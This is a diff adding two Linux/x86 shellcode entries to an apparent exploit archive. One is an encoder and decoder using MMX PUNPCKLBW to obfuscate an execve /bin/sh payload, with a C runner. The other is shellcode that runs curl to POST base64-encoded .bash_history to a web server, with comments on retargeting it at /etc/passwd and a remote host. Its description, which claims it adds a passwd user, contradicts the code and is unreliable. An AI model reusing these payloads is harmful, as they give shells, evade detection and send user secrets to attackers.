+46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
+46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86

shellcodes/generator/46696.py

@@ -0,0 +1,109 @@
+################################################################################
+INTRO
+################################################################################
+
+# Exploit Title: MMX-PUNPCKLBW Encoder
+# Description: Payload encoder using MMX PUNPCKLBW instruction
+# Date: 13/04/2019
+# Exploit Author: Petr Javorik
+# Tested on: Linux ubuntu 3.13.0-32-generic x86
+# Shellcode length: 61
+
+################################################################################
+ENCODER
+################################################################################
+
+#!/usr/bin/env python
+
+# stack execve
+SHELLCODE = bytearray(
+    b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
+)
+
+# Align to qword multiples
+missing_bytes = 8 - (len(SHELLCODE) % 8)
+padding = [0x90 for _ in range(missing_bytes)]
+SHELLCODE.extend(padding)
+
+# Shuffle payload
+shuffled_payload = []
+# First byte carries count of needed PUNPCKLBW loops
+loop_count = len(SHELLCODE)//8
+shuffled_payload.append(loop_count)
+for block_num in range(0, loop_count):
+    current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
+    shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
+    shuffled_payload.extend(shuffled_block)
+
+# Remove trailing NOPS
+for byte in shuffled_payload[::-1]:
+    if byte == 0x90:
+        del shuffled_payload[-1]
+    else:
+        break
+
+# Print shellcode
+print('Payload length: {}'.format(len(shuffled_payload)))
+print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
+print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
+
+################################################################################
+DECODER
+################################################################################
+
+global _start
+
+section .text
+_start:
+
+    jmp short call_decoder
+
+decoder:
+
+    pop edi
+    xor ecx, ecx
+    mov cl, [edi]
+    inc edi
+    mov esi, edi
+
+decode:
+
+    movq mm0, qword [edi]
+    movq mm1, qword [edi +4]
+    punpcklbw mm0, mm1
+    movq qword [edi], mm0
+    add edi, 0x8
+    loop decode
+    jmp esi
+
+call_decoder:
+
+    call decoder
+    EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80
+
+################################################################################
+TESTING
+################################################################################
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length:  %d\n", strlen(code));
+    int (*CodeFun)() = (int(*)())code;
+    CodeFun();
+}
+
+################################################################################
+
+
+Kind Regards
+------------------------------
+
+Bc. Petr Javorik
+www.mmquant.net
+ <http://www.mmquant.net/>maple@mmquant.net

shellcodes/linux_x86/46704.txt

@@ -0,0 +1,76 @@
+# Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
+# Google Dork: None
+# Date: 11.04.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 125
+------------------------------[Description]---------------------------------
+
+This shellcode writes a new user to the given passwd file
+
+Username = sshd
+password = root
+Shell = sh
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+  xor eax, eax
+  push eax
+  jmp short _cmd
+
+_build:
+  pop ecx
+  mov edi, ecx
+  xor ecx, ecx
+  push eax
+  push 0x68732f6e
+  push 0x69622f2f
+
+_param:
+  mov ebx, esp
+  push eax
+  push word 0x632d
+  mov esi, esp
+
+_exec:
+  push eax
+  push edi
+  push esi
+  push ebx
+
+  mov ecx, esp
+  mov al, 11
+  int 0x80
+
+_cmd:
+  call _build
+  msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
+  ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
+  ;change url to your server
+  ; change file to you target file like /etc/passwd
+
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";
+
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }